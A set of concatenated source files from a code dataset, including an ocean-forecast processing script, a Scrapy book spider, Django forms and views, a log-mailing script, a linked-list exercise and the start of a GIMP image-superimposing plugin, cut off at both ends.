(vide limites abaixo!):\nlonmax = '-47'\n# Latitude minima (vide limites abaixo!):\nlatmin = '-27.5'\n# Latitude maxima (vide limites abaixo!):\nlatmax = '-25.5'\n\n# Profundidade minima (em metros):\nprofmin = '1'\n# Profundidade maxima (em metros):\nprofmax = '100'\n# Intervalo de profundidade (em metros):\ndeltaprof = '10' # Isto eh, um dado a cada quantos metros?\n\n# Quantidade de dias de previsao:\n#dias_prev = 4 # Se 1, prog ira ate 24.\n # Se 2, prog ira ate 48.\n # Se 3, prog ira ate 72.\n # Se 4, prog ira ate 96.\n\n# ------------------------------------>\n# LAT E LON MINIMAS E MAXIMAS EM GRAUS:\n#\n# HYCOM 1/4 DE GRAU (0.25 GRAUS)\n# lonming=-98.0\n# lonmaxg=21.0\n# latming=-78.0\n# latmaxg=50.0\n# HYCOM 1/12 DE GRAU (0.08 GRAUS)\n# lonming=-68.0\n# lonmaxg=-18.0\n# latming=-45.0\n# latmaxg=10.0\n# HYCOM 1/24 DE GRAU (0.04 GRAUS)\n# lonming=-54.0\n# lonmaxg=-32.0\n# latming=-34.0\n# latmaxg=-12.0\n# ------------------------------------>\n\n# ============================================================>\n# --- FIM DA EDICAO DA ROTINA POR PARTE DO USUARIO ----------->\n# ============================================================>\n\n# ============================================================>\n# DEFINICAO DE DIRETORIO DOS DADOS DO HYCOM:\n\nif resHYCOM == '1/24':\n dirdados = '/mnt/nfs/dpns32/data1/operador/previsao/hycom_2_2/output/Previsao_1_24/Ncdf'\nelif resHYCOM == '1/12':\n dirdados = '/mnt/nfs/dpns32/data1/operador/previsao/hycom_2_2/output/Previsao_1_12/Ncdf'\nelif resHYCOM == '1/4':\n dirdados = '/mnt/nfs/dpns32/data1/operador/previsao/hycom_2_2/output/Previsao_1_4/Ncdf'\n\n# ============================================================>\n# CALCULO DO INSTANTE DE PROGNOSTICO FINAL:\n\n# Ano final da previsao:\n#ano_final = str((datetime(int(ano),int(mes),int(dia)) + timedelta(days=dias_prev)).year).zfill(4)\nano_final = ano\n\n# Mes final da previsao:\n#mes_final = str((datetime(int(ano),int(mes),int(dia)) + timedelta(days=dias_prev)).month).zfill(2)\nmes_final = mes\n\n# Dia final da previsao:\n#dia_final = str((datetime(int(ano),int(mes),int(dia)) + timedelta(days=dias_prev)).day).zfill(2)\ndia_final = dia\n\n# ============================================================>\n# SALVANDO DADOS FORNECIDOS PELO USUARIO:\n\n# Lista de variaveis a serem salvas:\n# (Os comentarios representam os produtos que as utilizam.)\ndados = {\n 'ano': ano, # corrente, cvert, txts.\n 'mes': mes, # corrente, cvert, txts.\n 'dia': dia, # corrente, cvert, txts.\n 'nome': nome, # corrente.\n 'resHYCOM': resHYCOM, # corrente.\n 'lat_sul': lat_sul, # corrente.\n 'lat_norte': lat_norte, # corrente.\n 'lon_oeste': lon_oeste, # corrente.\n 'lon_leste': lon_leste, # corrente.\n 'pNome1': pNome1, # corrente.\n 'plon1': plon1, # corrente.\n 'plat1': plat1, # corrente.\n 'pNome2': pNome2, # corrente.\n 'plon2': plon2, # corrente.\n 'plat2': plat2, # corrente.\n 'pNome3': pNome3, # corrente.\n 'plon3': plon3, # corrente.\n 'plat3': plat3, # corrente.\n 'prog': prog, # corrente.\n 'skip': skip, # corrente.\n 'mes_str': mes_str, # cvert.\n 'dia_sem': dia_sem, # cvert.\n 'lat_evento': lat_evento, # cvert.\n 'lon_evento': lon_evento, # cvert.\n 'localidade': localidade, # cvert.\n 'delta_lat': delta_lat, # cvert.\n 'delta_lon': delta_lon, # cvert.\n 'max_prof': max_prof, # cvert.\n 'HH': HH, # txts.\n 'lonmin': lonmin, # txts.\n 'lonmax': lonmax, # txts.\n 'latmin': latmin, # txts.\n 'latmax': latmax, # txts.\n 'profmin': profmin, # txts.\n 'profmax': profmax, # txts.\n 'deltaprof': deltaprof, # txts.\n 'ano_final': ano_final, # txts.\n 'mes_final': mes_final, # txts.\n 'dia_final': dia_final # txts.\n}\n\n# Salvando os dados:\nnp.save((dirlocal+'/dados_usuario'), dados)\n\n# ============================================================>\n# IMPORTANDO DADOS DO HYCOM CASO NECESSARIO:\n\n# Os dados serao importados somente caso eles NAO existam no\n# diretorio AuxDec_HYCOM.\n\n# If para baixar os dados somente caso os produtos desejados\n# contemplem \"corrente\" ou \"cvert\" (pois \"txts\" nao utilizam\n# os resultados em NetCDF):\n\n#if (cvert == 'SIM'):\n#\n# string = dirlocal+'/DadosHYCOM/HYCOM_MV_'+ano+mes+dia+'.nc'\n#\n# if (os.path.isfile(string) == False):\n# # Apagando dados antigos:\n# os.system('rm '+dirlocal+'/DadosHYCOM/HYCOM_MV_*_nc')\n# # String do comando:\n# print('Insira a senha de \"operador@10.13.100.31\":')\n# string = 'scp operador@10.13.100.31:' + dirdados + '/' + ano+mes+dia + '/HYCOM_MV_' + ano+mes+dia + '.nc ' + dirlocal + '/DadosHYCOM'\n# # Importacao do dado propriamente dita:\n# os.system(string)\n\n# ============================================================>\n# RODANDO AS ROTINAS DE CONFECCAO DOS AUXILIO-A-DECISAO:\n\n# Fazendo diretorio final das figuras:\nos.system('mkdir '+dirlocal+'/Produtos/'+ano+mes+dia)\n\n# Rodada de corrente_hycom.py:\nif (corrente == 'SIM'):\n os.system(dirpython+' '+dirlocal+'/corrente_hycom/corrente_hycom.py')\n\n# Rodada de cvert_hycom.py:\nif (cvert == 'SIM'):\n os.system(dirpython+' '+dirlocal+'/cvert_hycom/cvert_hycom.py')\n\n# Rodada de txts_hycom1.py:\nif (txts == 'SIM'):\n os.system(dirpython+' '+dirlocal+'/txts_hycom/txts_hycom1.py')\n\n# ============================================================>\n\n","sub_path":"AuxDec_HYCOM/auxdec_hycom.py","file_name":"auxdec_hycom.py","file_ext":"py","file_size_in_byte":11944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24047364","text":"#!/usr/bin/env python\nimport maidenhead\nfrom argparse import ArgumentParser\nimport sys\n\n\ndef main():\n p = ArgumentParser()\n p.add_argument(\"loc\", help=\"Maidenhead grid or lat lon\", nargs=\"+\")\n p.add_argument(\"-p\", \"--precision\", help=\"maidenhead precision\", type=int, default=3)\n p.add_argument(\"-u\", \"--url\", help=\"also output Google Maps URL\", action=\"store_true\")\n p = p.parse_args()\n\n if len(p.loc) == 1: # maidenhead\n maiden = p.loc[0]\n lat, lon = maidenhead.toLoc(maiden)\n print(lat, lon)\n elif len(p.loc) == 2: # lat lon\n maiden = maidenhead.toMaiden(p.loc[0], p.loc[1], p.precision)\n print(maiden)\n else:\n print(\n \"specify Maidenhead grid (single string) or lat lon (with space between)\",\n file=sys.stderr,\n )\n\n if p.url:\n print(maidenhead.google_maps(maiden))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Maidenhead.py","file_name":"Maidenhead.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"653123274","text":"from django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom apps.time_entries.models import TimeEntry\n\n\nclass TimeEntryCreateForm(forms.ModelForm):\n\n class Meta:\n model = TimeEntry\n fields = (\n \"project\", \"issue\", \"spent_on\", \"hours\", \"comments\", \"activity\"\n )\n\n\nclass IssueTimeEntryCreateForm(forms.ModelForm):\n\n class Meta:\n model = TimeEntry\n fields = (\"issue\", \"spent_on\", \"hours\", \"comments\", \"activity\")\n\n def __init__(self, *args, **kwargs):\n super(IssueTimeEntryCreateForm, self).__init__(*args, **kwargs)\n self.fields['activity'].empty_label = _(\"---Please select---\")\n self.fields['hours'].label = _(\"Hours\")\n self.fields['hours'].widget = forms.TextInput()\n","sub_path":"itracker/apps/time_entries/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"122508254","text":"from amazonscrape.items import AmazonscrapeItem\nimport scrapy\n\n\nclass AmazonSpider(scrapy.Spider):\n name = 'amazon'\n start_urls = ['https://www.amazon.com/best-sellers-books-Amazon/zgbs/books/ref=zg_bs_nav_0/']\n\n def parse(self, response):\n item = AmazonscrapeItem()\n books = response.css('.aok-relative')\n for book in books:\n item['name'] = book.css('.p13n-sc-truncate-desktop-type2::text').get().replace('\\n', '').strip()\n author = book.css('.a-link-child::text').get()\n if not author:\n author = book.css('.a-color-base::text').get()\n item['author'] = author\n item['image'] = book.css('.a-spacing-small img::attr(src)').get()\n item['price'] = book.css('.p13n-sc-price::text').get()\n yield item\n next_page = response.css('.a-last a::attr(href)').extract()\n print(next_page)\n if next_page:\n yield response.follow(next_page[0], callback=self.parse)\n","sub_path":"DataScience/Tutorial/WebScraping/Scrapy/amazonscrape/amazonscrape/spiders/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"352158135","text":"from .version import __version__\nfrom .boxes import sum_y, sum_x, answer, reverse_answer\nfrom .boxes_input import get_input_from_file, calculate_ids\n\n\n__all__ = [\n 'sum_y',\n 'sum_x',\n 'answer',\n 'reverse_answer',\n 'get_input_from_file',\n 'calculate_ids'\n]\n","sub_path":"boxbox/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"60564074","text":"from pymongo import MongoClient \nfrom tasks import *\nimport sys\n\nclient = MongoClient()\n\ndb = client.test\ncollection = db.mso\n\n# find all fail experiments\n\nproblems = {\n '8bit' : [TaskA(), TaskB()],\n '9bit' : [TaskC(), TaskD()],\n '10bit' : [TaskE(), TaskF()],\n 'breast-cancer' : [TaskG(), TaskH()],\n 'tic-tac-toe' : [TaskJ(), TaskK()],\n 'ionosphere' : [TaskL(), TaskM()], \n}\n\nfor experiment_id in collection.distinct('experiment_id'):\n for algorithm in collection.find({'experiment_id': experiment_id}).distinct('algorithm'):\n for task in collection.find({'experiment_id': experiment_id, 'algorithm': algorithm}).distinct('task'):\n item = collection.find_one({'experiment_id': experiment_id, 'task': task, 'algorithm': algorithm})\n if 'test_mse' in item:\n if len(item['test_mse']) != 1200:\n for item in collection.find({'experiment_id': experiment_id, 'task': task, 'algorithm': algorithm}):\n test_mse = item['test_mse'][[type(_).__name__ for _ in problems[experiment_id]].index(task)::2]\n collection.update(\n {'_id': item['_id']},\n {'$set':{'test_mse': test_mse}}\n )\n","sub_path":"publication/neural-mfea/support/fix_dataset.py","file_name":"fix_dataset.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"457052201","text":"import sensors.sensor as sensor\nfrom sensors import Variable\n\nif __name__ == '__main__':\n\n watts = Variable(\n name='wattage',\n a=3,\n b=1500,\n variance=10,\n limit=2000\n )\n\n temps = Variable(\n name='temperature',\n a=-0.01,\n b=22,\n variance=0.1,\n limit=20\n )\n\n # create heater sensor and run it\n heater = sensor.Sensor('heater', [watts, temps])\n heater.run_simulation()\n","sub_path":"sensors/heater_app/simulate_heater.py","file_name":"simulate_heater.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"87086438","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Script performed to send login_activity.txt file to a user\r\n\r\nimport smtplib\r\n\r\nfrom datetime import date\r\nfrom email.MIMEMultipart import MIMEMultipart\r\nfrom email.MIMEText import MIMEText\r\nfrom email.MIMEBase import MIMEBase\r\nfrom email import encoders\r\n\r\n# Send The Log File Before Erasing #\r\n\r\nmsg = MIMEMultipart()\r\nmsg['From'] = 'someone@gmail.com'\r\nrecipients = 'bob.dupont@gmail.com'\r\nmsg['Subject'] = 'Login Activity' \r\nmessage = 'Hi! \\n Please find the logs for the : {}/{}/{}.'.format(date.today().day, date.today().month, date.today().year)\r\n\r\nfilename = \"login_activity.txt\"\r\nattachment = open(\"/home/ubuntu/login_activity.txt\", \"rb\")\r\n \r\npart = MIMEBase('application', 'octet-stream')\r\npart.set_payload((attachment).read())\r\nencoders.encode_base64(part)\r\npart.add_header('Content-Disposition', \"attachment; filename= {}\".format(filename))\r\n \r\nmsg.attach(part)\r\n\r\nmsg.attach(MIMEText(message))\r\nmailserver = smtplib.SMTP('smtp.gmail.com', 587) # using gmail SMTP server\r\nmailserver.ehlo()\r\nmailserver.starttls()\r\nmailserver.ehlo()\r\nmailserver.login('login', 'password')\r\nmailserver.sendmail(msg['From'], recipients, msg.as_string())\r\nmailserver.quit()\r\n\r\n\r\n# Erase File logs #\r\n\r\nwith open('/home/ubuntu/login_activity.txt', 'w') as file:\r\n\tfile.write('')\r\n\tfile.close()\r\n\r\n","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593331497","text":"from io import BytesIO\nimport lxml.html\nfrom PIL import Image\nimport download\ndef get_captcha():\n #tree = lxml.html.fromstring(html)\n #img_data = html.cssselect('div.mydiv img')[0].get('src')\n #img = img_data.replace('..','')\n #print(img)\n new_data =\"http://callback.58.com/firewall/code/710717830/f749e7b5717241eba8319dfc0eac4694.do\" \n print(new_data)\n img_data = download.download_url(new_data)\n \n #print(img_data)\n #img_data = img_data.partition(',')[-1]\n #binary_img_data = img_data.decode('base64')\n file_like = BytesIO(img_data)\n img = Image.open(file_like)\n #img = Image.open(img_data)\n img.show()\n img.save('test.jpeg')\n print(img)\nget_captcha()\n\n","sub_path":"register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"42980222","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass ListNode:\n def __init__(self, *args, **kwargs):\n if type(args[0]) is int:\n self.val = args[0]\n self.next = None\n\n if type(args[0]) is list:\n self.val = args[0][0] if len(args[0]) > 0 else None\n self.next = ListNode(args[0][1:]) if len(args[0]) > 1 else None\n\n def print_list_val(self):\n target = self\n\n while target.next is not None:\n print(target.val, end=' > ')\n target = target.next\n\n print(target.val)\n\n\ndef cal_list_value(node: ListNode) -> int:\n a = ''\n while True:\n a = str(node.val) + a\n if node.next is None:\n break\n node = node.next\n\n return int(a)\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n c = cal_list_value(l1) + cal_list_value(l2)\n answer = ListNode(0)\n p = answer\n\n for _ in range(len(str(c))):\n p.next = ListNode(c % 10)\n p = p.next\n c = c // 10\n\n return answer.next\n\n\ns = Solution()\ns.addTwoNumbers(ListNode([2, 4, 3]), ListNode([5, 6, 4])).print_list_val()\n\n\"\"\"\nRuntime: 76 ms, faster than 30.04% of Python3 online submissions for Add Two Numbers.\nMemory Usage: 12.7 MB, less than 100.00% of Python3 online submissions for Add Two Numbers.\n\nhttps://leetcode.com/problems/add-two-numbers/discuss/352181/Python3-Carry-sum10\n\"\"\"","sub_path":"0001/0002_Add_Two_Numbers.py","file_name":"0002_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639307875","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2018-2020- Swiss Data Science Center (SDSC)\n# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and\n# Eidgenössische Technische Hochschule Zürich (ETHZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Represent provenance processes.\"\"\"\n\nimport weakref\n\nfrom renku.core.models import jsonld as jsonld\nfrom renku.core.models.entities import CommitMixin\n\n\n@jsonld.s(\n type=[\n 'wfdesc:Process',\n 'prov:Entity',\n 'prov:Plan',\n ],\n context={\n 'wfdesc': 'http://purl.org/wf4ever/wfdesc#',\n 'prov': 'http://www.w3.org/ns/prov#',\n },\n cmp=False,\n)\nclass Process(CommitMixin):\n \"\"\"Represent a process.\"\"\"\n\n _activity = jsonld.ib(\n default=None,\n context='prov:activity',\n kw_only=True,\n converter=lambda value: weakref.ref(value)\n if value is not None else None,\n type='renku.core.models.provenance.activities.Activity'\n )\n\n @property\n def activity(self):\n \"\"\"Return the activity object.\"\"\"\n return self._activity()\n\n\n@jsonld.s(\n type=[\n 'wfdesc:Workflow',\n 'prov:Entity',\n 'prov:Plan',\n ],\n context={\n 'wfdesc': 'http://purl.org/wf4ever/wfdesc#',\n 'prov': 'http://www.w3.org/ns/prov#',\n },\n cmp=False,\n)\nclass Workflow(Process):\n \"\"\"Represent workflow with subprocesses.\"\"\"\n\n subprocesses = jsonld.ib(context='wfdesc:hasSubProcess', kw_only=True)\n\n @subprocesses.default\n def default_subprocesses(self):\n \"\"\"Load subprocesses.\"\"\"\n return [\n subprocess.association.plan\n for subprocess in self.activity.subprocesses.values()\n ]\n","sub_path":"renku/core/models/provenance/processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"64765638","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport theano\n\nfrom . import NeuralLayer\nfrom deepy.utils import global_theano_rand, FLOATX\n\nclass Dropout(NeuralLayer):\n\n def __init__(self, p):\n super(Dropout, self).__init__(\"dropout\")\n self.p = p\n\n def compute_tensor(self, x):\n if self.p > 0:\n # deal with the problem of test_value\n backup_test_value_setting = theano.config.compute_test_value\n theano.config.compute_test_value = 'ignore'\n binomial_mask = global_theano_rand.binomial(x.shape, p=1-self.p, dtype=FLOATX)\n theano.config.compute_test_value = backup_test_value_setting\n # apply dropout\n x *= binomial_mask\n return x\n\n def compute_test_tesnor(self, x):\n if self.p > 0:\n x *= (1.0 - self.p)\n return x\n","sub_path":"deepy/layers/dropout.py","file_name":"dropout.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"487412787","text":"a=\" Write a Python program to find the list of words\"\nb=a.split()\nn=int(input(\"enter : \"))\ndef name(a,n):\n\tfor i in b:\n\t\tif len(i)>n:\n\t\t\t print(i)\nprint(name(b,n))\nprint([i for i in b if len(i)>n])\nprint(list(filter(lambda x: (x in b) and (len(x)>n) ,b)))\n","sub_path":"python_practice/W3_lists/eg_10.py","file_name":"eg_10.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"463994466","text":"import tensorflow as tf\n\n\ndef srvc_base(lr, scale, F, block_h, block_w):\n est = lr\n patches = tf.space_to_batch_nd(lr, block_shape=[block_h, block_w], paddings=[[0, 0], [0, 0]])\n\n features = tf.layers.conv2d(patches, 256, 3, strides=(1, 1), padding='valid',\n data_format='channels_last', dilation_rate=(1, 1), activation=tf.nn.relu,\n use_bias=True)\n kernel = tf.layers.conv2d(features, 3 * 3 * 3 * F, 3, strides=(1, 1), padding='valid',\n data_format='channels_last', dilation_rate=(1, 1), activation=None,\n use_bias=True)\n bias = tf.layers.conv2d(features, F, 3, strides=(1, 1), padding='valid',\n data_format='channels_last', dilation_rate=(1, 1), activation=None,\n use_bias=True)\n kernel = tf.reshape(kernel, [-1, 1, 1, 3 * 3 * 3, F])\n bias = tf.reshape(bias, [-1, 1, 1, F])\n\n patches = tf.image.extract_patches(patches, sizes=[1, 3, 3, 1], strides=[1, 1, 1, 1], rates=[1, 1, 1, 1],\n padding='SAME')\n patches = tf.expand_dims(patches, axis=3)\n patches = tf.matmul(patches, kernel)\n patches = tf.squeeze(patches, axis=3) + bias\n patches = tf.nn.relu(patches)\n est = tf.batch_to_space_nd(patches, block_shape=[block_h, block_w], crops=[[0, 0], [0, 0]])\n\n est = tf.layers.conv2d(est, 128, 5, strides=(1, 1), padding='same',\n data_format='channels_last', dilation_rate=(1, 1), activation=tf.nn.relu,\n use_bias=True)\n est = tf.layers.conv2d(est, 32, 3, strides=(1, 1), padding='same',\n data_format='channels_last', dilation_rate=(1, 1), activation=tf.nn.relu,\n use_bias=True)\n est = tf.layers.conv2d(est, 3 * scale * scale, 3, strides=(1, 1), padding='same',\n data_format='channels_last', dilation_rate=(1, 1), activation=None,\n use_bias=True)\n est = tf.nn.depth_to_space(est, scale, data_format='NHWC')\n indepth_est = est\n return indepth_est\n\n\ndef srvc(lr):\n scale = 4\n F = 32\n block_h = tf.shape(lr)[1] / 5\n block_w = tf.shape(lr)[2] / 5\n return srvc_base(lr, scale, F, block_h, block_w)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144064794","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom .models import Group, Site\n\n# Create your views here.\ndef index(request):\n\tgroups = Group.objects.all()\n\tcontext = {'groups': groups}\n\treturn render(request, 'homepage_app/index.html', context)\n\n# Get the HTML of the sites inside a group specified in the request\ndef group(request):\n\tgroup_name = request.GET[\"group\"]\n\tgroup = Group.objects.get(pk=group_name)\n\treturn render(request, \"homepage_app/sites.html\", {'group':group})\n\ndef add_site(request):\n\t# get the group to which the site is added\n\tgroup_id = request.POST[\"group\"]\n\tgroup = Group.objects.get(pk=group_id)\n\n\t# get the new site info\n\tsite_name = request.POST[\"name\"]\n\tsite_link = request.POST[\"link\"]\n\n\tif request.POST[\"action\"]:\n\t\tgroup.add_site(name=site_name, link=site_link, in_action=request.POST[\"action\"])\n\telse:\n\t\tgroup.add_site(name=site_name, link=site_link)\n\n\treturn HttpResponse(\"Site saved\");\n\ndef delete_site(request):\n\tsite_name = request.POST[\"site\"]\n\tsite = Site.objects.get(pk=site_name)\n\tsite.delete()\n\treturn HttpResponse(\"Site deleted\")\n\ndef move_site(request):\n\tsite_name = request.POST[\"site\"]\n\tgroup_name = request.POST[\"group\"]\n\n\tsite = Site.objects.get(pk=site_name)\n\tsite.move_to_group(group_name)\n","sub_path":"homepage_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"440133357","text":"from django.shortcuts import render\nfrom django.template.loader import get_template\nfrom django.http import HttpResponse\nfrom datetime import datetime\n\n# Create your views here.\ndef index(request, tvno='0'):\n tv_list = [{'name':'CCTV News', 'tvcode':'yPhFG2I0dE0'},\n {'name':'CCTV Chinese international', 'tvcode':'E1DTZBy4xr4'},]\n \n template = get_template('index.html')\n now = datetime.now()\n tvno = tvno\n tv = tv_list[int(tvno)]\n hour = now.timetuple().tm_hour\n html = template.render(locals())\n return HttpResponse(html)\n\ndef carlist(request, maker=0):\n car_maker = ['SAAB', 'Ford', 'Honda', 'Mazda', 'Nissan','Toyota' ]\n car_list = [ [],\n ['Fiesta', 'Focus', 'Modeo', 'EcoSport', 'Kuga', 'Mustang'],\n ['Fit', 'Odyssey', 'CR-V', 'City', 'NSX'],\n ['Mazda3', 'Mazda5', 'Mazda6', 'CX-3', 'CX-5', 'MX-5'],\n ['Tida', 'March', 'Livina', 'Sentra', 'Teana', 'X-Trail', 'Juke', 'Murano'],\n ['Camry','Altis','Yaris','86','Prius','Vios', 'RAV4', 'Wish']\n ]\n maker = int(maker)\n maker_name = car_maker[maker]\n cars = car_list[maker]\n template = get_template('carlist.html')\n html = template.render(locals())\n\n return HttpResponse(html)\n\ndef carprice(request, maker=0):\n car_maker = ['Ford', 'Honda', 'Mazda']\n car_list = [[\t{'model':'Fiesta', 'price': 203500}, \n {'model':'Focus','price': 605000}, \n {'model':'Mustang','price': 900000}],\n [\t{'model':'Fit', 'price': 450000}, \n {'model':'City', 'price': 150000}, \n {'model':'NSX', 'price':1200000}],\n [\t{'model':'Mazda3', 'price': 329999}, \n {'model':'Mazda5', 'price': 603000},\n {'model':'Mazda6', 'price':850000}],\n ]\n maker = int(maker)\n maker_name = car_maker[maker]\n cars = car_list[maker]\n template = get_template('carprice.html')\n html = template.render(locals())\n\n return HttpResponse(html) ","sub_path":"mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"139999290","text":"#!/usr/bin/env python\n\n# Scale an image and then set its size so that is 1920 x 1080 in resolution.\n#\n# To invoke this Plugin from the command line, use a command which is similar to the following;\n#\n# gimp --no-interface \\\n# --verbose \\\n# --console-messages \\\n# --batch-interpreter=\"plug-in-script-fu-eval\" \\\n# --batch '(python-fu-batch-scale-and-set-size-noninterctive RUN-NONINTERACTIVE 1920 1080 3 \"/home/foo/fileList.txt\")' \\\n# --batch \"(gimp-quit 1)\"\n#\n# /home/foo/fileList.txt should be a file that contains a list of those files (one per line)\n# which should be operated on by the Plugin.\n#\n# Exmples of locations within which Gimp Plugins can reside;\n#\n# - /home/foo/.gimp-2.x/plug-ins\n# - /usr/lib/gimp/2.0/plug-ins\n\n\nfrom os import path\nfrom gimpfu import register, main, pdb, gimp, PF_IMAGE, PF_DRAWABLE, PF_INT, PF_STRING, PF_FILE, INTERPOLATION_NONE, INTERPOLATION_LINEAR, INTERPOLATION_CUBIC, INTERPOLATION_LANCZOS, PF_RADIO\n\nimport gtk\n\n\ndef \\\nsuperimpose_image_over_another_noninteractive(\n\n # image,\n # drawable,\n list_filenames,\n list_filenames_superimpose\n # horizontalLocation,\n # verticalLocation\n) :\n\n\tnameFunction = \"superimpose_image_over_another_interactive\"\n\n\tprint(\"----------------------------------------\")\n\tprint(\"%s : Enter\" % (nameFunction))\n\n\tIFS = \";\"\n\n\t# listFiles = fileContents.split(IFS)\n\n\tlistFiles = list_filenames.split(IFS)\n\tlistFiles_superimpose = list_filenames_superimpose.split(IFS)\n\n\tprint(\"%s : Number of elements in list = %d\" % (nameFunction, len(listFiles)))\n\tprint(\"%s : File list = %s\" % (nameFunction, listFiles))\n\t\n\tprint(\"%s : Number of elements in list = %d\" % (nameFunction, len(listFiles_superimpose)))\n\tprint(\"%s : File list = %s\" % (nameFunction, listFiles_superimpose))\n\t\n\tif (len(listFiles) == 0) :\n\n\t\tprint(\"%s : Number of background image files = 0 : a\") % (nameFunction)\n\n\t\t# errdialog = gtk.MessageDialog(\n\t\t# None,\n\t\t# 0,\n\t\t# gtk.MESSAGE_ERROR,\n\t\t# gtk.BUTTONS_OK,\n\t\t# \"A) You must specify at least one background image file.\"\n\t\t# )\n\t\t# errdialog.show_all()\n\t\t# errdialog.run()\n\n\t\t# raise Exception(\"You must specify at least one background image file.\")\n\n\telif (len(listFiles_superimpose) == 0) :\n\n\t\tgimp.message(\"B) You must specify at least one superimpose image file.\")\n\t\tprint(\"%s : Number of superimpose image files = 0 : a\") % (nameFunction)\n\t\t# raise Exception(\"You must specify at least one superimpose image file.\")\n\n\t# elif (len(listFiles) == 1) : and \n\telif (listFiles[0] == '') :\n\n\t\tgimp.message(\"C) You must specify at least one background image file.\")\n\t\tprint(\"%s : Number of background image files = 0 : b\") % (nameFunction)\n\t\t# raise Exception(\"You must specify at least one background image file.\")\n\n\t# elif (len(listFiles_superimpose) == 1) and \n\telif (listFiles_superimpose[0] == '') :\n\n\t\tgimp.message(\"D) You must specify at least one superimpose image file.\")\n\t\tprint(\"%s : Number of superimpose image files = 0 : b\") % (nameFunction)\n\t\t# raise Exception(\"You must specify at least one superimpose image file.\")\n\n\telif len(listFiles) != len(listFiles_superimpose) :\n\n\t\tgimp.message(\"E) The number of files specified must be the same for both background and superimpose images.\")\n\t\tprint(\"%s : The number of files specified must be the same for both background and superimpose images!\") % (nameFunction)\n\t\t# raise Exception(\"The number of files specified must be the same for both background and superimpose images!\")\n\n\tindexList = 0\n\n\tfor filename in listFiles :\n\n\t\tindexList = indexList + 1\n\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\t\tprint(\"%s : Filename = %s\" % (nameFunction, filename))\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\n\t\tif (not path.isfile(filename)) :\n\n\t\t\tprint(\"%s : > is NOT a file\" % (nameFunction))\n\t\t\t\n\t\t\tcontinue\n\n\t\tfilename_superimpose = listFiles_superimpose[indexList - 1]\n\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\t\tprint(\"%s : Filename of image to superimpose = %s\" % (nameFunction, filename_superimpose))\n\t\tprint(\"%s : ========================================\" % (nameFunction))\n\t\n\t\tif (not path.isfile(filename_superimpose)) :\n\t\t\n\t\t\tprint(\"%s : > is NOT a file\" % (nameFunction))\n\n\t\tgimp.progress_init(\"Superimposing one image over the other\")\n\n\t\timage = pdb.gimp_file_load(filename, filename)\n\t\tdrawable = pdb.gimp_image_get_active_layer(image)\n\n\t\t# Start a GIMP Undo group, as this will allow the actions of this Plugin to be undone in one step.\n\n\t\tpdb.gimp_undo_push_group_start(image)\n\n\t\twidthImage = image.width\n\t\theightImage = image.height\n\t\t\n\t\twidthDrawable = drawable.width\n\t\theightDrawable = drawable.height\n\t\n\t\tprint(\"Width image = %s\" % widthImage)\n\t\tprint(\"Height image = %s\" 